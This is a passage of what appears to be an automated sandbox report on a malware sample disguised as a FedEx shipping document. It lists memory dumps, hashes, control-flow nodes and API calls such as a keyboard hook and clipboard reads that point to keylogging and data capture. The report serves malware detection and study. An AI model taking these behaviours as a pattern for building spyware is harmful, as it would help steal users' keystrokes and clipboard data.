                                                                                        • Opcode Fuzzy Hash: 6e5cc6ab55b7d4b6a754517b9621f7867c3bd4aae6a4ec478ea7485ee8414e2d
                                                                                        • Instruction Fuzzy Hash: 27F06272404284AEE7218E1ADC84B66FFACEB51634F18C55AED485F286C37D9844CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e790f7868c70ecc691d7668c73d82ad3d91e74adc94a7cbaae6229bacf76772
                                                                                        • Instruction ID: fb83ac9be3a60cccc06a86ad00555dbfdc9ac6c6f70241ff70f7f988e6cefe8b
                                                                                        • Opcode Fuzzy Hash: 6e790f7868c70ecc691d7668c73d82ad3d91e74adc94a7cbaae6229bacf76772
                                                                                        • Instruction Fuzzy Hash: EE12A6F14117468BE330CF65F99868D3BA1B7453AAF906308D2A16BAF9D7B4134ACF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b10ec072e1479a6cd8e0297820e6cb7bc44dfc5dc9bf623ef20c36dd99630507
                                                                                        • Instruction ID: e6573094d0da48ff1c38697bae97a32bd1009021dfdff53856a5ee80781b38b6
                                                                                        • Opcode Fuzzy Hash: b10ec072e1479a6cd8e0297820e6cb7bc44dfc5dc9bf623ef20c36dd99630507
                                                                                        • Instruction Fuzzy Hash: 54A15D36E0061A8FDF15DFA9C8845DDBBB2FF84310B15856AE905EB261EF35AA05CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91f76effb691257f03ddc6e4499d630b30b9e973574154b2b955567440213d3f
                                                                                        • Instruction ID: 393fde8f5dc6d97b3532dcbb1a78e1be6c8e9605baa474625526bfae44a11e07
                                                                                        • Opcode Fuzzy Hash: 91f76effb691257f03ddc6e4499d630b30b9e973574154b2b955567440213d3f
                                                                                        • Instruction Fuzzy Hash: C7C15AB18117468BD730CF64E89828D3BB1FB853A9F506309D2616BAF9D7B4124ACF84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage: 10.6%
                                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                                        Signature Coverage: 0.9%
                                                                                        Total number of Nodes: 349
                                                                                        Total number of Limit Nodes: 35
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06C9895D), ref: 06C9B907
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 40a95820598d7b32a1bb767b33e53b9688501ec571a2be22c2598f0bcba4cc47
                                                                                        • Instruction ID: 701faa8e2236cb219f060cda56c833993a957b677a99aaa65863ce0551f1a5dc
                                                                                        • Opcode Fuzzy Hash: 40a95820598d7b32a1bb767b33e53b9688501ec571a2be22c2598f0bcba4cc47
                                                                                        • Instruction Fuzzy Hash: E7530771D10B5A8ACB51EF68C884599F7B1FF99300F11D79AE0587B221EB70AAC5CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000), ref: 06AA2803
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: ea32f1086c9972fd909ec4328f14b1c4ce72297df377e4344e0a18cc67f49a33
                                                                                        • Instruction ID: 3d482a16d515668942f425a05bd06506d4e693a6738ec2fa52224b91e6dff0a7
                                                                                        • Opcode Fuzzy Hash: ea32f1086c9972fd909ec4328f14b1c4ce72297df377e4344e0a18cc67f49a33
                                                                                        • Instruction Fuzzy Hash: DB211575D002099FCB54DF9AD844BEEBBF5EB98320F14842AE419B7250C774AA44CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f7748bb1180ae3ffadc10a1a62f9cf196e4be383e86bb4ce9684b8037197c5a0
                                                                                        • Instruction ID: ebca7571ca27068c186bc359732c545463273b37103b45512ee0b1e6b864d32d
                                                                                        • Opcode Fuzzy Hash: f7748bb1180ae3ffadc10a1a62f9cf196e4be383e86bb4ce9684b8037197c5a0
                                                                                        • Instruction Fuzzy Hash: D7022AB4B102058FDB54CF68C888B6ABBF1FF49710F168599E906DB3A2DA75EC41CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 447 6e3e158-6e3e173 448 6e3e175-6e3e19c call 6e3ccac 447->448 449 6e3e19d-6e3e1bc call 6e3ccb8 447->449 455 6e3e1c2-6e3e221 449->455 456 6e3e1be-6e3e1c1 449->456 463 6e3e223-6e3e226 455->463 464 6e3e227-6e3e2b4 GlobalMemoryStatusEx 455->464 468 6e3e2b6-6e3e2bc 464->468 469 6e3e2bd-6e3e2e5 464->469 468->469
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525803702.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6e30000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ebed8913869dbaf2bc614b3c8b3f1b91439c216d823a81a7cc82a16dc1e6472
                                                                                        • Instruction ID: b100977780844d078e4c75f7176a002d471325faa77d29765f281ec82bde93cc
                                                                                        • Opcode Fuzzy Hash: 8ebed8913869dbaf2bc614b3c8b3f1b91439c216d823a81a7cc82a16dc1e6472
                                                                                        • Instruction Fuzzy Hash: B541F131D043AA8FCB01CFB9D85429EBFF5AF8A310F1585ABD449E7251DB789844CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 472 6c91c50-6c935d6 474 6c935d8-6c935de 472->474 475 6c935e1-6c935e8 472->475 474->475 476 6c935ea-6c935f0 475->476 477 6c935f3-6c93692 CreateWindowExW 475->477 476->477 479 6c9369b-6c936d3 477->479 480 6c93694-6c9369a 477->480 484 6c936e0 479->484 485 6c936d5-6c936d8 479->485 480->479 486 6c936e1 484->486 485->484 486->486
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C93682
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 28017fcb31b400592690a52ab27fbc92c3754892cba7a8cbfa738788af145c1c
                                                                                        • Instruction ID: dd62dd1e5c56986baf7c0b0891a81802f80b29aa255c2ce7b70d2c51b121c124
                                                                                        • Opcode Fuzzy Hash: 28017fcb31b400592690a52ab27fbc92c3754892cba7a8cbfa738788af145c1c
                                                                                        • Instruction Fuzzy Hash: 8051A0B1D00349DFDF14CFAAC984ADEBBB5BF88310F24812AE819AB250D7759945CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 487 6c93564-6c935d6 489 6c935d8-6c935de 487->489 490 6c935e1-6c935e8 487->490 489->490 491 6c935ea-6c935f0 490->491 492 6c935f3-6c9362b 490->492 491->492 493 6c93633-6c93692 CreateWindowExW 492->493 494 6c9369b-6c936d3 493->494 495 6c93694-6c9369a 493->495 499 6c936e0 494->499 500 6c936d5-6c936d8 494->500 495->494 501 6c936e1 499->501 500->499 501->501
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C93682
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: d1d66b794320d1618de892ebb97cf966344c5234e6002d33325faf0c3132c2e7
                                                                                        • Instruction ID: bb9eb33a62a551c2bb96761f8edf40f7465157da0af7e8ed527d64815f622e84
                                                                                        • Opcode Fuzzy Hash: d1d66b794320d1618de892ebb97cf966344c5234e6002d33325faf0c3132c2e7
                                                                                        • Instruction Fuzzy Hash: 2651B1B1D00349DFDF14CF9AC984ADEBBB5BF88310F24812AE819AB250D7749945CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 502 70d0130-70d0157 503 70d0159-70d015c 502->503 504 70d015e-70d0160 503->504 505 70d0163-70d0166 503->505 504->505 506 70d0168-70d016f 505->506 507 70d0174-70d0177 505->507 506->507 508 70d0179 507->508 509 70d0188-70d018b 507->509 516 70d0180-70d0183 508->516 510 70d018d-70d0196 509->510 511 70d01a1-70d01a4 509->511 512 70d019c 510->512 513 70d025e-70d0267 510->513 514 70d01ae-70d01b1 511->514 515 70d01a6-70d01a9 511->515 512->511 517 70d026d-70d0274 513->517 518 70d0434-70d046e 513->518 519 70d01d6-70d01d9 514->519 520 70d01b3-70d01c8 514->520 515->514 516->509 521 70d0279-70d027c 517->521 534 70d0470-70d0473 518->534 522 70d01df-70d01e2 519->522 523 70d0321-70d0327 519->523 624 70d01cb call 70d0120 520->624 625 70d01cb call 70d0130 520->625 524 70d027e-70d0284 521->524 525 70d0296-70d0299 521->525 529 70d01e4-70d01fd 522->529 530 70d0202-70d0205 522->530 523->524 528 70d032d 523->528 524->518 533 70d028a-70d0291 524->533 531 70d029b-70d029d 525->531 535 70d02bd-70d02c0 525->535 536 70d0332-70d0335 528->536 529->530 530->531 532 70d020b-70d020e 530->532 541 70d029f-70d02a9 531->541 542 70d02ab 531->542 537 70d021f-70d0222 532->537 538 70d0210-70d0214 532->538 533->525 539 70d0479-70d047c 534->539 540 70d0546-70d059b 534->540 535->510 543 70d02c6-70d02c9 535->543 545 70d034c-70d034f 536->545 546 70d0337-70d0347 536->546 552 70d0259-70d025c 537->552 553 70d0224-70d024b 537->553 550 70d02cb-70d02ce 538->550 551 70d021a 538->551 554 70d047e-70d0482 539->554 555 70d0489-70d048c 539->555 613 70d059d-70d059f 540->613 556 70d02b0-70d02b2 541->556 542->556 543->550 557 70d02d3-70d02d6 543->557 544 70d01d1 544->519 548 70d03f8-70d042d 545->548 549 70d0355-70d0358 545->549 546->545 548->518 558 70d036c-70d036f 549->558 559 70d035a-70d0361 549->559 550->557 551->537 552->513 552->521 622 70d024e call 70d0120 553->622 623 70d024e call 70d0130 553->623 560 70d048e-70d04a0 554->560 561 70d0484 554->561 555->560 564 70d04b0-70d04b2 555->564 562 70d02b8 556->562 563 70d03b3-70d03c4 556->563 565 70d02d8-70d02e6 557->565 566 70d02eb-70d02ee 557->566 576 70d0371-70d037e 558->576 577 70d0383-70d0386 558->577 559->529 575 70d0367 559->575 597 70d04a8-70d04ab 560->597 561->555 562->535 563->508 587 70d03ca 563->587 573 70d04b9-70d04bc 564->573 574 70d04b4 564->574 565->566 570 70d0308-70d030b 566->570 571 70d02f0-70d0303 566->571 580 70d030d 570->580 581 70d031c-70d031f 570->581 571->570 573->534 583 70d04be-70d04fe 573->583 574->573 575->558 576->577 584 70d0388-70d038e 577->584 585 70d0393-70d0396 577->585 596 70d0314-70d0317 580->596 581->523 581->536 627 70d0500 call 70d054d 583->627 628 70d0500 call 70d0120 583->628 629 70d0500 call 70d0130 583->629 584->585 591 70d039e-70d03a1 585->591 592 70d0398-70d0399 585->592 595 70d03cf-70d03d2 587->595 599 70d03ae-70d03b1 591->599 600 70d03a3-70d03a9 591->600 592->591 602 70d03dc-70d03de 595->602 603 70d03d4-70d03d9 595->603 596->581 597->564 599->563 599->595 600->599 606 70d03e5-70d03e8 602->606 607 70d03e0 602->607 603->602 606->503 610 70d03ee-70d03f5 606->610 607->606 611 70d0254 611->552 615 70d05a6-70d05a9 613->615 616 70d05a1 613->616 614 70d0506-70d0522 619 70d052d 614->619 620 70d0524 614->620 615->613 618 70d05ab-70d05c9 call 70d05fd 615->618 616->615 621 70d05cf-70d05d0 618->621 619->540 620->619 622->611 623->611 624->544 625->544 627->614 628->614 629->614
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \
                                                                                        • API String ID: 0-2967466578
                                                                                        • Opcode ID: bce6abbd91a573193f791488322f7b2b27e48d1f918f404244caa13525955d3e
                                                                                        • Instruction ID: 3c9e40370f1ae69ad1233cc15f6c15c0e01b737c5e5bc0e7f74597f912fb7a6e
                                                                                        • Opcode Fuzzy Hash: bce6abbd91a573193f791488322f7b2b27e48d1f918f404244caa13525955d3e
                                                                                        • Instruction Fuzzy Hash: 8FD160B0A0130A9FDF64CBA8C9947AEB7F5EF45310F10462AE449E7291EB75DC81CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 630 6c961e4-6c98354 633 6c9835a-6c9835f 630->633 634 6c98404-6c98424 call 6c91c7c 630->634 636 6c98361-6c98398 633->636 637 6c983b2-6c983ea CallWindowProcW 633->637 641 6c98427-6c98434 634->641 644 6c9839a-6c983a0 636->644 645 6c983a1-6c983b0 636->645 638 6c983ec-6c983f2 637->638 639 6c983f3-6c98402 637->639 638->639 639->641 644->645 645->641
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 06C983D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 20d2189329515c2a34587cd0342a553ef6509901afcb127af270fb9d66399996
                                                                                        • Instruction ID: 0c2e55f1218e1999b28dbd636399d7a08cea1d176a0679c465702548cd3dc88d
                                                                                        • Opcode Fuzzy Hash: 20d2189329515c2a34587cd0342a553ef6509901afcb127af270fb9d66399996
                                                                                        • Instruction Fuzzy Hash: EF416DB5900305DFDB50CF9AC888AAABBF5FF88314F24C859E419A7321C374A941CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 647 6c9bd10-6c9caa0 OleGetClipboard 650 6c9caa9-6c9caf7 647->650 651 6c9caa2-6c9caa8 647->651 656 6c9caf9-6c9cafd 650->656 657 6c9cb07 650->657 651->650 656->657 658 6c9caff 656->658 659 6c9cb08 657->659 658->657 659->659
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard
                                                                                        • String ID:
                                                                                        • API String ID: 220874293-0
                                                                                        • Opcode ID: 176884a66fcd203c968e1ae1e7d57dd9c06bf7d4ccd3986dc7b33f2574df7ba8
                                                                                        • Instruction ID: ab482de8b8f64ff11f8be83ec25310453856ee2a3458644faac28c32f8ea4d2e
                                                                                        • Opcode Fuzzy Hash: 176884a66fcd203c968e1ae1e7d57dd9c06bf7d4ccd3986dc7b33f2574df7ba8
                                                                                        • Instruction Fuzzy Hash: 783101B0D01248DFDB50CF9AC888BDEBBF5AB48314F248019E405BB394DBB4A945CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 660 6c9c9fc-6c9ca58 661 6c9ca62-6c9caa0 OleGetClipboard 660->661 662 6c9caa9-6c9caf7 661->662 663 6c9caa2-6c9caa8 661->663 668 6c9caf9-6c9cafd 662->668 669 6c9cb07 662->669 663->662 668->669 670 6c9caff 668->670 671 6c9cb08 669->671 670->669 671->671
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard
                                                                                        • String ID:
                                                                                        • API String ID: 220874293-0
                                                                                        • Opcode ID: 46f7e34bb6ed764772b1eb23d12c7281f3028d8aa06eac9ad8ac3306c00b8ead
                                                                                        • Instruction ID: 4ade5fca66b0656284dfaa309d43c2f0be47704239c7f071abf3647638b65915
                                                                                        • Opcode Fuzzy Hash: 46f7e34bb6ed764772b1eb23d12c7281f3028d8aa06eac9ad8ac3306c00b8ead
                                                                                        • Instruction Fuzzy Hash: CC3110B0D00248DFDB50CF99D888BDEBBF5AB48314F248019E004BB294DB74A945CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 672 6c96f0d-6c96f1a 673 6c96f20-6c96fb4 DuplicateHandle 672->673 674 6c96fbd-6c96fda 673->674 675 6c96fb6-6c96fbc 673->675 675->674
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C968BE,?,?,?,?,?), ref: 06C96FA7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: be6d4a513589a8fecf34ca5d27f2bd1568d84e57b49d57dec285afa6d49007b0
                                                                                        • Instruction ID: d319a0f4909621ab13846a6649aced725f0440d916afc0fe38da2e6570edb1a4
                                                                                        • Opcode Fuzzy Hash: be6d4a513589a8fecf34ca5d27f2bd1568d84e57b49d57dec285afa6d49007b0
                                                                                        • Instruction Fuzzy Hash: 6921D4B5D002589FDF10CFAAD984ADEBBF8EB58324F14845AE954A3250D378A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 678 6c96084-6c96fb4 DuplicateHandle 680 6c96fbd-6c96fda 678->680 681 6c96fb6-6c96fbc 678->681 681->680
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C968BE,?,?,?,?,?), ref: 06C96FA7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 8511a49f6300d49433feca7b32c403da5c860f4926b1f168508cf6f7fa8c88b6
                                                                                        • Instruction ID: 70801facb990d8497fa26eb89068e331ed6db66db4c48acc6fb8358393beb33b
                                                                                        • Opcode Fuzzy Hash: 8511a49f6300d49433feca7b32c403da5c860f4926b1f168508cf6f7fa8c88b6
                                                                                        • Instruction Fuzzy Hash: A22105B5D002089FDF10CFAAD884ADEBBF8EB48324F14841AE914A3350D378A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 694 6aa2783-6aa27d2 696 6aa27de-6aa2810 SetWindowsHookExA 694->696 697 6aa27d4-6aa27dc 694->697 698 6aa2819-6aa2839 696->698 699 6aa2812-6aa2818 696->699 697->696 699->698
                                                                                        APIs
                                                                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000), ref: 06AA2803
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not extracted; legend: executed / not executed)
• Nodes: 703 6aaa7c4-6aab6c0 705 6aab6c8-6aab6f7 LoadLibraryExW 703->705 706 6aab6c2-6aab6c5 703->706 707 6aab6f9-6aab6ff 705->707 708 6aab700-6aab71d 705->708 706->705 707->708
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06AAB659,00000800), ref: 06AAB6EA
Memory Dump Source
• Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not extracted; legend: executed / not executed)
• Nodes: 711 6aab679-6aab6c0 713 6aab6c8-6aab6f7 LoadLibraryExW 711->713 714 6aab6c2-6aab6c5 711->714 715 6aab6f9-6aab6ff 713->715 716 6aab700-6aab71d 713->716 714->713 715->716
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06AAB659,00000800), ref: 06AAB6EA
Memory Dump Source
• Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not extracted; legend: executed / not executed)
• Nodes: 719 6e3e240-6e3e2b4 GlobalMemoryStatusEx 721 6e3e2b6-6e3e2bc 719->721 722 6e3e2bd-6e3e2e5 719->722 721->722
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 06E3E2A7
Memory Dump Source
• Source File: 00000001.00000002.525803702.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6e30000_FeDex_shipping_document.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not extracted; legend: executed / not executed)
• Nodes: 725 6c9bbee-6c9c1b4 727 6c9c1b5-6c9c212 OleInitialize 725->727 728 6c9c21b-6c9c238 727->728 729 6c9c214-6c9c21a 727->729 729->728
APIs
• OleInitialize.OLE32(00000000), ref: 06C9C205
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 06C914D6
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 06C914D6
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06C9895D), ref: 06C9B907
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06C9C205
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06C9C205
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06C9C205
Memory Dump Source
